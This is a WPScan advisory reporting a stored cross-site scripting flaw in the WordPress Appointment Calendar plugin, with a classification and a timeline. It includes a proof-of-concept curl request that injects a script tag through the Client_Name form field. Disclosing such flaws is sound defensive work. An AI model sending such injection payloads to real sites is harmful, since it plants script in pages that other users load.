Appointment Calendar - Stored Cross-Site Scripting (XSS)



Description
When user submist data from appointments there is no validation which leads to stored XSS. 
Proof of Concept
curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Host: localhost'  -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0' -H 'X-Requested-With: XMLHttpRequest' --data 'ServiceId=1&AppDate=02-11-2016&StartTime=10:30 AM&Client_Name=<script>alert("hello")</script>&Client_Email=test@test.com&Client_Phone=123456&Client_Note=&Service_Duration=30'

Affects Plugin

References

URL https://wordpress.org/plugins/appointment-calendar/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Naeem Shah
Views 658
Verified No
WPVDB ID 8633

Timeline

Publicly Published 2016-09-30 (about 2 years ago)
Added 2016-10-01 (about 2 years ago)
Last Updated 2018-08-29 (about 2 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.